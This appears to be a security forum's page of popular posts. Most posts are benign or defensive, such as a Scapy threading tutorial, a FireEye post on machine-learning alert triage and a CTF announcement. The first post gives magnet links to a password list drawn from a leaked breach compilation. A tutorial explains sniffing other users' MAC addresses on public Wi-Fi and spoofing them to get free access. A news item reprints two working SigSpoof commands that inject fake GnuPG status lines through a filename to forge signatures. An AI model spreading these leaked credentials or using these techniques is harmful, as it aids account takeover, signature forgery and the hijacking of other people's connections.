Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 06/18/18 in all areas

  1. wordlist created from original 41G stash via: grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt Then, compressed with: 7z a breachcompilation.txt.7z breachcompilation.txt Size: 4.1G compressed 9.0G uncompressed No personal information included - just a list of passwords. magnet url: magnet:?xt=urn:btih:5a9ba318a5478769ddc7393f1e4ac928d9aa4a71&dn=breachcompilation.txt.7z full base magnet:?xt=urn:btih:7ffbcd8cee06aba2ce6561688cf68ce2addca0a3&dn=BreachCompilation&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fglotorrents.pw%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337 Mirror [944.4 MB, expands to 4.07 GB] Source: reddit.com
    1 point
  2. 0 sanse sa mai recuperezi ceva.
    1 point
  3. Depinde de - cat de importante sunt pozele - ce resurse ai la dispozitie (timp, cunostinte, chef, bani) - versiune iPhone si iOS - cand au fost sterse Poti cauta diferite keywords pe Google gen "recover iphone deleted photos", "restore deleted iphone photo", "iphone forensics recover deleted files", etc. pentru idei. Sunt si ceva apps (gen dr fone) dar sunt slabe si in general se bazeaza pe faptul ca nu si-a facut inca sync cu icloud-ul. Inainte sa dai bani pe apps care iti cer bani citeste reviews si fa research pe Google sa vezi daca ajuta ori ba.
    1 point
  4. Free Wifi This short tutorial describes a few methods for gaining access to the Internet, a basic human right, from public wireless networks. This tutorial has been tested on Mac and a Raspberry Pi. It should generally work on Linux, and hasn't been tested on Windows. Preparation Make sure you do this step before you are stuck without Internet access: Install Python pip On Linux, install Python Developer package, a dependency for the netifaces package. Ubuntu $ sudo apt-get install python-dev Fedora $ sudo dnf install python-devel Note: For Centos, substitute dnf with yum Make a copy of this repository and install dependencies for the script: $ git clone https://github.com/kylemcdonald/FreeWifi $ cd FreeWifi && sudo pip install -r requirements.txt How to get additional time If you had free internet access but your time has run out, the first thing to try is open an incognito/private window. Here are instructions for a few browsers: Chrome (mobile and desktop) Safari for iOS Safari for Mac Microsoft Edge An incognito/private window will temporarily clear any cookies that may have been used for tracking how much time you spent online, making you look like a "new user" and allowing you to log into the wireless portal again. Unfortunately, most systems track MAC addresses instead of cookies. A MAC address is a unique identifier assigned to every network interface. This means you need to get a new MAC address to get additional time. Fortunately, MAC addresses can be changed in software, without swapping the hardware. The spoof-mac command line utility makes this easy by entering sudo spoof-mac randomize Wi-Fi. If the command fails to run, try entering spoof-mac list --wifi to check what the name of your wireless device is first, and use that manually. After randomizing your MAC, try logging into the wireless portal again. When you're done using the Internet, run sudo spoof-mac reset Wi-Fi to reset your MAC address. Note that MAC address spoofing may be interpreted as an illegal activity depending on why you do it. In some cases it is certainly not illegal: recent mobile operating systems like iOS 8+ and Android 6+ automatically randomize their MAC address when searching for wireless networks to avoid being tracked. But when Aaron Swartz liberated JSTOR, MAC address spoofing was claimed as a signal of intention to commit a crime. How to get free access If the network is open, but you can't get access for some reason, you can also try spoofing the MAC address of a device that is already using the network. To the router, your device and the other device will look like one device. This can cause some minor problems if they interrupt each other, but for light browsing it usually works out fine. To find the MAC addresses of other devices using the network, first you need to connect to the network. You don't need to have Internet access, just a connection. First, on Mac OS run the command sudo chmod o+r /dev/bpf* once to make sure you can sniff wireless data (you need to do this again if you restart your computer). Then run the command python wifi-users.py. You should see a progress bar immediately: Available interfaces: en0 Interface: en0 SSID: nonoinflight Available gateways: en0 Gateway IP: 10.0.1.1 Gateway MAC: 00:e0:4b:22:96:d9 100%|██████████████████████████| 1000/1000 [00:46<00:00, 21.46it/s] Total of 5 user(s): 27:35:96:a8:66:7f 6359 bytes 36:fe:83:9c:35:eb 9605 bytes 65:01:3c:cc:20:e8 17306 bytes 8c:6f:11:2c:f0:ee 20515 bytes 0a:4f:b2:b8:e8:56 71541 bytes If there isn't much traffic on the network, it might take longer. If it's taking too long, type CTRL-C to cancel the sniffing and print whatever results are available. Finally, we want to spoof one of these MAC addresses. For example, in this case we would enter sudo spoof-mac set 0a:4f:b2:b8:e8:56 Wi-Fi to try spoofing the address with the most traffic (they probably have a connection). After running that command, try to access the Internet. If you don't have a connection, try the next MAC in the list. If your Internet connection drops out while using this MAC address, try disconnecting and reconnecting to the wireless network. Note that the original user of the MAC you copied may experience these same connection drop outs if you are both actively using the network. How it works wifi-users.py uses tcpdump to collect wireless packets. Then we look through these packets for any hints of the MAC address (BSSID) of our wireless network. Finally, we look for data packets that mention a user's MAC as well as the network BSSID (or the network gateway), and take note of that MAC using some amount of data. Then we sort the user's MACs by the total amount of data and print them out. Instead of sniffing wireless traffic, in some situations you can also use the command arp -a to get a list of MAC addresses of devices on the wireless network. Then you can either use spoof-mac to copy the address, or use ifconfig directly on Linux and OSX. For the specifics of using ifconfig look at the implementations of set_interface_mac inside SpoofMac's interfaces.py. This repository is dedicated to Lauren McCarthy, who has taught me the most about the art of getting a good deal. Source
    1 point
  5. Scapy is an incredible tool when it comes to playing with the network. As it is written on its official website, Scapy can replace a majority of network tools such as nmap, hping and tcpdump. One of the features offered by Scapy is to sniff the network packets passing through a computer’s NIC. Below is a small example: from scapy.all import * interface = "eth0" def print_packet(packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) print("[*] Start sniffing...") sniff(iface=interface, filter="ip", prn=print_packet) print("[*] Stop sniffing") This little sniffer displays the source and the destination of all packets having an IP layer: $ sudo python3 sniff_main_thread.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing It will continue to sniff network packets until it receives a keyboard interruption (CTRL+C). Now, let’s look at a new example: from scapy.all import * from threading import Thread from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet) def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() This piece of code does exactly the same thing as the previous one except that this time the sniff function is executed inside a dedicated thread. Everything works well with this new version except when it comes to stopping the sniffer: $ sudo python3 sniff_thread_issue.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing ^CTraceback (most recent call last): File "sniff_thread_issue.py", line 25, in <module> sleep(100) KeyboardInterrupt During handling of the above exception, another exception occurred: Traceback (most recent call last): File "sniff_thread_issue.py", line 28, in <module> sniffer.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt ^CException ignored in: <module 'threading' from '/usr/lib/python3.5/threading.py'> Traceback (most recent call last): File "/usr/lib/python3.5/threading.py", line 1288, in _shutdown t.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt When CTRL+C is pressed, a SIGTERM signal is sent to the process executing the Python script, triggering its exit routine. However, as said in the official documentation about signals, only the main thread receives signals: As a result, when CTRL+C is pressed, only the main thread raises a KeyboardInterrupt exception. The sniffing thread will continue its infinite sniffing loop, blocking at the same time the call of sniffer.join(). So, how can the sniffing thread be stopped if not by signals? Let’s have a look at this next example: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface self.stop_sniffer = Event() def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet, stop_filter=self.should_stop_sniffer) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() As you may have noticed, we are now using the stop_filter parameter in the sniff function call. This parameter expects to receive a function which will be called after each new packet to evaluate if the sniffer should continue its job or not. An Event object named stop_sniffer is used for that purpose. It is set to true when the join method is called to stop the thread. Is this the end of the story? Not really… $ sudo python3 sniff_thread_issue_2.py [*] Start sniffing... ^C[*] Stop sniffing [!] New Packet: 10.137.2.30 -> 10.137.2.1 One side effect remains. Because the should_stop_sniffer method is called only once after each new packet, if it returns false, the sniffer will continue its job, going back to its infinite sniffing loop. This is why the sniffer stopped one packet ahead of the keyboard interruption. A solution would be to force the sniffing thread to stop. As explained in the official documentation about threading, it is possible to flag a thread as a daemon thread for that purpose: However, even if this solution would work, the thread won’t release the resources it might hold: The sniff function uses a socket which is released just before exiting, after the sniffing loop: try: while sniff_sockets: // Sniffing loop except KeyboardInterrupt: pass if opened_socket is None: for s in sniff_sockets: s.close() return plist.PacketList(lst,"Sniffed") Therefore, the solution I suggest is to open the socket outside the sniff function and to give it to this last one as parameter. Consequently, it would be possible to force-stop the sniffing thread while closing its socket properly: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.daemon = True self.socket = None self.interface = interface self.stop_sniffer = Event() def run(self): self.socket = conf.L2listen( type=ETH_P_ALL, iface=self.interface, filter="ip" ) sniff( opened_socket=self.socket, prn=self.print_packet, stop_filter=self.should_stop_sniffer ) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join(2.0) if sniffer.isAlive(): sniffer.socket.close() Et voilà! The sniffing thread now waits for 2 seconds after having received a keyboard interrupt, letting the time to the sniff function to terminate its job by itself, after which the sniffing thread will be force-stopped and its socket properly closed from the main thread. Source
    1 point
  6. NetRipper - Added support for Chrome 67 (32 and 64 bits) https://github.com/NytroRST/NetRipper
    1 point
  7. SigSpoof flaw fixed inGnuPG, Enigmail, GPGTools, and python-gnupg. For their entire existence, some of the world's most widely used email encryption tools have been vulnerable to hacks that allowed attackers to spoof the digital signature of just about any person with a public key, a researcher said Wednesday. GnuPG, Enigmail, GPGTools, and python-gnupg have all been updated to patch the critical vulnerability. Enigmail and the Simple Password Store have also received patches for two related spoofing bugs. Digital signatures are used to prove the source of an encrypted message, data backup, or software update. Typically, the source must use a private encryption key to cause an application to show that a message or file is signed. But a series of vulnerabilities dubbed SigSpoof makes it possible in certain cases for attackers to fake signatures with nothing more than someone’s public key or key ID, both of which are often published online. The spoofed email shown at the top of this post can't be detected as malicious without doing forensic analysis that's beyond the ability of many users. Backups and software updates affected, too The flaw, indexed as CVE-2018-12020, means that decades' worth of email messages many people relied on for sensitive business or security matters may have in fact been spoofs. It also has the potential to affect uses that went well beyond encrypted email. CVE-2018-12020 affects vulnerable software only when it enables a setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default, but a variety of highly recommended configurations available online—including the cooperpair safe defaults, Ultimate GPG settings, and Ben's IT-Kommentare—turn it on. Once verbose is enabled, Brinkmann's post includes three separate proof-of-concept spoofing attacks that work against the previously mentioned tools and possibly many others. The spoofing works by hiding metadata in an encrypted email or other message in a way that causes applications to treat it as if it were the result of a signature-verification operation. Applications such as Enigmail and GPGTools then cause email clients such as Thunderbird or Apple Mail to falsely show that an email was cryptographically signed by someone chosen by the attacker. All that's required to spoof a signature is to have a public key or key ID. The attacks are relatively easy to carry out. The code for one of Brinkmann’s PoC exploits that forges the digital signature of Enigmail developer Patrick Brunschwig is: $ echo 'Please send me one of those expensive washing machines.' \ | gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \ \n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\ \n[GNUPG:] TRUST_FULLY 0 classic\ \ngpg: '\'`" > poc1.msg A second exploit is: echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \ \n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\ \n[GNUPG:] TRUST_FULLY\ \n[GNUPG:] BEGIN_DECRYPTION\ \n[GNUPG:] DECRYPTION_OKAY\ \n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\ \ngpg: '\'`" > poc2.msg Brinkmann told Ars that the root cause of the bug goes back to GnuPG 0.2.2 from 1998, "although the impact would have been different then and changed over time as more apps use GPG." He publicly disclosed the vulnerability only after developers of the tools known to be vulnerable were patched. The flaws are patched in GnuPG version 2.2.8, Enigmail 2.0.7, GPGTools 2018.3, and python GnuPG 0.4.3. People who want to know the status of other applications that use OpenPGP should check with the developers. Wednesday's vulnerability disclosure comes a month after researchers revealed a different set of flaws that made it possible for attackers to decrypt previously obtained emails that were encrypted using PGP or S/MIME. Efail, as the bugs were dubbed, could be exploited in a variety of email programs, including Thunderbird, Apple Mail, and Outlook. Separately, Brinkmann reported two SigSpoof-related vulnerabilities in Enigmail and the Simple Password Store that also made it possible to spoof digital signatures in some cases. CVE-2018-12019 affecting Enigmail can be triggered even when the verbose setting isn't enabled. It, too, is patched in the just-released version 2.0.7. CVE-2018-12356, meanwhile, let remote attackers spoof file signatures on configuration files and extensions scripts, potentially allowing the accessing of passwords or the execution of malicious code. The fix is here. Via arstechnica.com
    1 point
  8. Many cyber incidents can be traced back to an original alert that was either missed or ignored by the Security Operations Center (SOC) or Incident Response (IR) team. While most analysts and SOCs are vigilant and responsive, the fact is they are often overwhelmed with alerts. If a SOC is unable to review all the alerts it generates, then sooner or later, something important will slip through the cracks. The core issue here is scalability. It is far easier to create more alerts than to create more analysts, and the cyber security industry is far better at alert generation than resolution. More intel feeds, more tools, and more visibility all add to the flood of alerts. There are things that SOCs can and should do to manage this flood, such as increasing automation of forensic tasks (pulling PCAP and acquiring files, for example) and using aggregation filters to group alerts into similar batches. These are effective strategies and will help reduce the number of required actions a SOC analyst must take. However, the decisions the SOC makes still form a critical bottleneck. This is the “Analyze/ Decide” block in Figure 1. Figure 1: Basic SOC triage stages In this blog post, we propose machine learning based strategies to help mitigate this bottleneck and take back control of the SOC. We have implemented these strategies in our FireEye Managed Defense SOC, and our analysts are taking advantage of this approach within their alert triaging workflow. In the following sections, we will describe our process to collect data, capture alert analysis, create a model, and build an efficacy workflow – all with the ultimate goal of automating alert triage and freeing up analyst time. Reverse Engineering the Analyst Every alert that comes into a SOC environment contains certain bits of information that an analyst uses to determine if the alert represents malicious activity. Often, there are well-paved analytical processes and pathways used when evaluating these forensic artifacts over time. We wanted to explore if, in an effort to truly scale our SOC operations, we could extract these analytical pathways, train a machine to traverse them, and potentially discover new ones. Think of a SOC as a self-contained machine that inputs unlabeled alerts and outputs the alerts labeled as “malicious” or “benign”. How can we capture the analysis and determine that something is indeed malicious, and then recreate that analysis at scale? In other words, what if we could train a machine to make the same analytical decisions as an analyst, within an acceptable level of confidence? Basic Supervised Model Process The data science term for this is a “Supervised Classification Model”. It is “supervised” in the sense that it learns by being shown data already labeled as benign or malicious, and it is a “classification model” in the sense that once it has been trained, we want it to look at a new piece of data and make a decision between one of several discrete outcomes. In our case, we only want it to decide between two “classes” of alerts: malicious and benign. In order to begin creating such a model, a dataset must be collected. This dataset forms the “experience” of the model, and is the information we will use to “train” the model to make decisions. In order to supervise the model, each unit of data must be labeled as either malicious or benign, so that the model can evaluate each observation and begin to figure out what makes something malicious versus what makes it benign. Typically, collecting a clean, labeled dataset is one of the hardest parts of the supervised model pipeline; however, in the case of our SOC, our analysts are constantly triaging (or “labeling”) thousands of alerts every week, and so we were lucky to have an abundance of clean, standardized, labeled alerts. Once a labeled dataset has been defined, the next step is to define “features” that can be used to portray the information resident in each alert. A “feature” can be thought of as an aspect of a bit of information. For example, if the information is represented as a string, a natural “feature” could be the length of the string. The central idea behind building features for our alert classification model was to find a way to represent and record all the aspects that an analyst might consider when making a decision. Building the model then requires choosing a model structure to use, and training the model on a subset of the total data available. The larger and more diverse the training data set, generally the better the model will perform. The remaining data is used as a “test set” to see if the trained model is indeed effective. Holding out this test set ensures the model is evaluated on samples it has never seen before, but for which the true labels are known. Finally, it is critical to ensure there is a way to evaluate the efficacy of the model over time, as well as to investigate mistakes so that appropriate adjustments can be made. Without a plan and a pipeline to evaluate and retrain, the model will almost certainly decay in performance. Feature Engineering Before creating any of our own models, we interviewed experienced analysts and documented the information they typically evaluate before making a decision on an alert. Those interviews formed the basis of our feature extraction. For example, when an analyst says that reviewing an alert is “easy”, we ask: “Why? And what helps you make that decision?” It is this reverse engineering of sorts that gives insight into features and models we can use to capture analysis. For example, consider a process execution event. An alert on a potentially malicious process execution may contain the following fields: Process Path Process MD5 Parent Process Process Command Arguments While this may initially seem like a limited feature space, there is a lot of useful information that one can extract from these fields. Beginning with the process path of, say, “C:\windows\temp\m.exe”, an analyst can immediately see some features: The process resides in a temporary folder: C:\windows\temp\ The process is two directories deep in the file system The process executable name is one character long The process has an .exe extension The process is not a “common” process name While these may seem simple, over a vast amount of data and examples, extracting these bits of information will help the model to differentiate between events. Even the most basic aspects of an artifact must be captured in order to “teach” the model to view processes the way an analyst does. The features are then encoded into a more discrete representation, similar to this: Temp_folder Depth Name_Length Extension common_process_name TRUE 2 1 exe FALSE Another important feature to consider about a process execution event is the combination of parent process and child process. Deviation from expected “lineage” can be a strong indicator of malicious activity. Say the parent process of the aforementioned example was ‘powershell.exe’. Potential new features could then be derived from the concatenation of the parent process and the process itself: ‘powershell.exe_m.exe’. This functionally serves as an identity for the parent-child relation and captures another key analysis artifact. The richest field, however, is probably the process arguments. Process arguments are their own sort of language, and language analysis is a well-tread space in predictive analytics. We can look for things including, but not limited to: Network connection strings (such as ‘http://’, ‘https://’, ‘ftp://’). Base64 encoded commands Reference to Registry Keys (‘HKLM’, ‘HKCU’) Evidence of obfuscation (ticks, $, semicolons) (read Daniel Bohannon’s work for more) The way these features and their values appear in a training dataset will define the way the model learns. Based on the distribution of features across thousands of alerts, relationships will start to emerge between features and labels. These relationships will then be recorded in our model, and ultimately used to influence the predictions for new alerts. Looking at distributions of features in the training set can give insight into some of these potential relationships. For example, Figure 2 shows how the distribution of Process Command Length may appear when grouping by malicious (red) and benign (blue). Figure 2: Distribution of Process Event alerts grouped by Process Command Length This graph shows that over a subset of samples, the longer the command length, the more likely it is to be malicious. This manifests as red on the right and blue on the left. However, process length is not the only factor. As part of our feature set, we also thought it would be useful to approximate the “complexity” of each command. For this, we used “Shannon entropy”, a commonly used metric that measures the degree of randomness present in a string of characters. Figure 3 shows a distribution of command entropy, broken out into malicious and benign. While the classes do not separate entirely, we can see that for this sample of data, samples with higher entropy generally have a higher chance of being malicious. Figure 3: Distribution of Process Event alerts grouped by entropy Model Selection and Generalization Once features have been generated for the whole dataset, it is time to use them to train a model. There is no perfect procedure for picking the best model, but looking at the type of features in our data can help narrow it down. In the case of a process event, we have a combination of features represented as strings and numbers. When an analyst evaluates each artifact, they ask questions about each of these features, and combine the answers to estimate the probability that the process is malicious. For our use case, it also made sense to prioritize an ‘interpretable’ model – that is, one that can more easily expose why it made a certain decision about an artifact. This way analysts can build confidence in the model, as well as detect and fix analytical mistakes that the model is making. Given the nature of the data, the decisions analysts make, and the desire for interpretability, we felt that a decision tree-based model would be well-suited for alert classification. There are many publicly available resources to learn about decision trees, but the basic intuition behind a decision tree is that it is an iterative process, asking a series of questions to try to arrive at a highly confident answer. Anyone who has played the game “Twenty Questions” is familiar with this concept. Initially, general questions are asked to help eliminate possibilities, and then more specific questions are asked to narrow down the possibilities. After enough questions are asked and answered, the ‘questioner’ feels they have a high probability of guessing the right answer. Figure 4 shows an example of a decision tree that one might use to evaluate process executions. Figure 4: Decision tree for deciding whether an alert is benign or malicious For the example alert in the diagram, the “decision path” is marked in red. This is how this decision tree model makes a prediction. It first asks: “Is the length greater than 100 characters?” If so, it moves to the next question “Does it contain the string ‘http’?” and so on until it feels confident in making an educated guess. In the example in Figure 4, given that 95 percent of all the training alerts traveling this decision path were malicious, the model predicts a 95 percent chance that this alert will also be malicious. Because they can ask such detailed combinations of questions, it is possible that decision trees can “overfit”, or learn rules that are too closely tied to the training set. This reduces the model’s ability to “generalize” to new data. One way to mitigate this effect is to use many slightly different decision trees and have them each “vote” on the outcome. This “ensemble” of decision trees is called a Random Forest, and it can improve performance for the model when deployed in the wild. This is the algorithm we ultimately chose for our model. How the SOC Alert Model Works When a new alert appears, the data in the artifact is transformed into a vector of the encoded features, with the same structure as the feature representations used to train the model. The model then evaluates this “feature vector” and applies a confidence level for the predicted label. Based on thresholds we set, we can then classify the alert as malicious or benign. Figure 5: An alert presented to the analyst with its raw values captured As an example, the event shown in Figure 5 might create the following feature values: Parent Process: ‘wscript’ Command Entropy: 5.08 Command Length =103 Based on how they were trained, the trees in the model each ask a series of questions of the new feature vector. As the feature vector traverses each tree, it eventually converges on a terminal “leaf” classifying it as either benign or malicious. We can then evaluate the aggregated decisions made by each tree to estimate which features in the vector played the largest role in the ultimate classification. For the analysts in the SOC, we then present the features extracted from the model, showing the distribution of those features over the entire dataset. This gives the analysts insight into “why” the model thought what it thought, and how those features are represented across all alerts we have seen. For example, the “explanation” for this alert might look like: Command Entropy = 5.08 > 4.60: 51.73% Threat occuranceOfChar “\”= 9.00 > 4.50: 64.09% Threat occuranceOfChar:“)” (=0.00) <= 0.50: 78.69% Threat NOT processTree=”cmd.exe_to_cscript.exe”: 99.6% Threat Thus, at the time of analysis, the analysts can see the raw data of the event, the prediction from the model, an approximation of the decision path, and a simplified, interpretable view of the overall feature importance. How the SOC Uses the Model Showing the features the model used to reach the conclusion allows experienced analysts to compare their approach with the model, and give feedback if the model is doing something wrong. Conversely, a new analyst may learn to look at features they may have otherwise missed: the parent-child relationship, signs of obfuscation, or network connection strings in the arguments. After all, the model has learned on the collective experience of every analyst over thousands of alerts. Therefore, the model provides an actionable reflection of the aggregate analyst experience back to the SOC, so that each analyst can transitively learn from their colleagues. Additionally, it is possible to write rules using the output of the model as a parameter. If the model is particularly confident on a subset of alerts, and the SOC feels comfortable automatically classifying that family of threats, it is possible to simply write a rule to say: “If the alert is of this type, AND for this malware family, AND the model confidence is above 99, automatically call this alert bad and generate a report.” Or, if there is a storm of probable false positives, one could write a rule to cull the herd of false positives using a model score below 10. How the Model Stays Effective The day the model is trained, it stops learning. However, threats – and therefore alerts – are constantly evolving. Thus, it is imperative to continually retrain the model with new alert data to ensure it continues to learn from changes in the environment. Additionally, it is critical to monitor the overall efficacy of the model over time. Building an efficacy analysis pipeline to compare model results against analyst feedback will help identify if the model is beginning to drift or develop structural biases. Evaluating and incorporating analyst feedback is also critical to identify and address specific misclassifications, and discover potential new features that may be necessary. To accomplish these goals, we run a background job that updates our training database with newly labeled events. As we get more and more alerts, we periodically retrain our model with the new observations. If we encounter issues with accuracy, we diagnose and work to address them. Once we are satisfied with the overall accuracy score of our retrained model, we store the model object and begin using that model version. We also provide a feedback mechanism for analysts to record when the model is wrong. An analyst can look at the label provided by the model and the explanation, but can also make their own decision. Whether they agree with the model or not, they can input their own label through the interface. We store this label provided by the analyst along with any optional explanation given by them regarding the explanation. Finally, it should be noted that these manual labels may require further evaluation. As an example, consider a commodity malware alert, in which network command and control communications were sinkholed. An analyst may evaluate the alert, pull back triage details, including PCAP samples, and see that while the malware executed, the true threat to the environment was mitigated. Since it does not represent an exigent threat, the analyst may mark this alert as ‘benign’. However, the fact that it was sinkholed does not change that the artifacts of execution still represent malicious activity. Under different circumstances, this infection could have had a negative impact on the organization. However, if the benign label is used when retraining the model, that will teach the model that something inherently malicious is in fact benign, and potentially lead to false negatives in the future. Monitoring efficacy over time, updating and retraining the model with new alerts, and evaluating manual analyst feedback gives us visibility into how the model is performing and learning over time. Ultimately this helps to build confidence in the model, so we can automate more tasks and free up analyst time to perform tasks such as hunting and investigation. Conclusion A supervised learning model is not a replacement for an experienced analyst. However, incorporating predictive analytics and machine learning into the SOC workflow can help augment the productivity of analysts, free up time, and ensure they utilize investigative skills and creativity on the threats that truly require expertise. This blog post outlines the major components and considerations of building an alert classification model for the SOC. Data collection, labeling, feature generation, model training, and efficacy analysis must all be carefully considered when building such a model. FireEye continues to iterate on this research to improve our detection and response capabilities, continually improve the detection efficacy of our products, and ultimately protect our clients. The process and examples shown discussed in this post are not mere research. Within our FireEye Managed Defense SOC, we use alert classification models built using the aforementioned processes to increase our efficiency and ensure we apply our analysts’ expertise where it is needed most. In a world of ever increasing threats and alerts, increasing SOC efficiency may mean the difference between missing and catching a critical intrusion. Source
    1 point
  9. Google Capture the Flag 2018 The qualification round will begin June 23 and finish June 24. 1. The first place will win $13,337 USD 2. The second place $7,331 USD 3. The third place $3,133.7 USD We will pay for the best 32 writeups 100 to 500 USD. https://ctftime.org/event/623 https://capturetheflag.withgoogle.com/
    1 point
  10. While hackers already hunt for ways to steal money, some vulnerabilities further allow them for successful crypto hacks. Recently, experts from Chinese cybersecurity firm Qihoo’s 360 Netlab revealed a massive theft of $20 Million worth of Ethereum by hackers. Apparently, a Geth vulnerability allowed the hackers to make this theft possible from unsafe clients. Geth Vulnerability Made Ethereum Clients Unsafe A few months ago, 360 Netlab, a Chinese cybersecurity company, told crypto traders about how a Geth vulnerability could let hackers steal money. The issue affected port 8545 which allowed for a hacker to access Geth clients. Now, the researchers confirm that their speculation was right. In fact, not only they confirmed the vulnerability, but they also proved its functionality. According to their recent tweet, hackers have already stolen Ethereum from unsecured Geth clients worth $20 million. Geth is a famous client meant for running full Ethereum nodes that enables the users to manage them remotely through JSON-RPC interface. According to 360 Netlab, Geth by default ‘listens on port 8545’. The hackers, thus, actively look for vulnerabilities in this 8545 port to steal cryptocurrency. Usually, this port is available only locally and is not open to the external internet. Therefore, anyone having this port open publicly is a target for being hacked. Securing Your Wallets From Hackers A quick scan of the hacker’s address will let you know the exact amount. When LHN looked over the hackers account (0x957cD4Ff9b3894FC78b5134A8DC72b032fFbC464), the amount stolen seems to have increased further, crossing the amount of Ether reported earlier (38,642.23856 ETH). At the time of writing this article, the hacker’s wallet shows 38,642.68624 ETH as available. This proves that the hackers are still actively stealing money from unsecured wallets. According to 360 Netlab, you can view these addresses in the payload. “If you’ve honeypot running on port 8545, you should be able to see the requests in the payload which has the wallet addresses. There are quite a few IPs scanning heavily on this port now.” The researchers have also disclosed some wallet addresses that supposedly belong to hackers. Users should only connect with Geth clients from local computers. They can also enable user-authorization for remote RPC connections. Via latesthackingnews.com
    1 point
  11. Full Video: 02:08 - Begin of Recon 14:00 - XXE Detection on Fulcrum API 17:40 - XXE Get Files 23:40 - XXE File Retrieval Working 24:30 - Lets Code a Python WebServer to Aid in XXE Exploitation 39:45 - Combining XXE + SSRF (Server Side Request Forgery) to gain Code Execution 47:28 - Shell Returned + Go Over LinEnum 56:49 - Finding WebUser's Password and using WinRM to pivot 01:06:00 - Getting Shell via WinRM, finding LDAP Credentials 01:14:00 - Using PowerView to Enumerate AD Users 01:27:06 - Start of getting a Shell on FILE (TroubleShooting FW) 01:35:35 - Getting shell over TCP/53 on FILE 01:37:58 - Finding credentials on scripts in Active Directories NetLogon Share, then finding a way to execute code as the Domain Admin... Triple Hop Nightmare 01:58:10 - Troubleshooting the error correctly and getting Domain Admin! 02:03:54 - Begin of unintended method (Rooting the initial Linux Hop) 02:09:54 - Root Exploit Found 02:12:25 - Mounting the VMDK Files and accessing AD.
    1 point
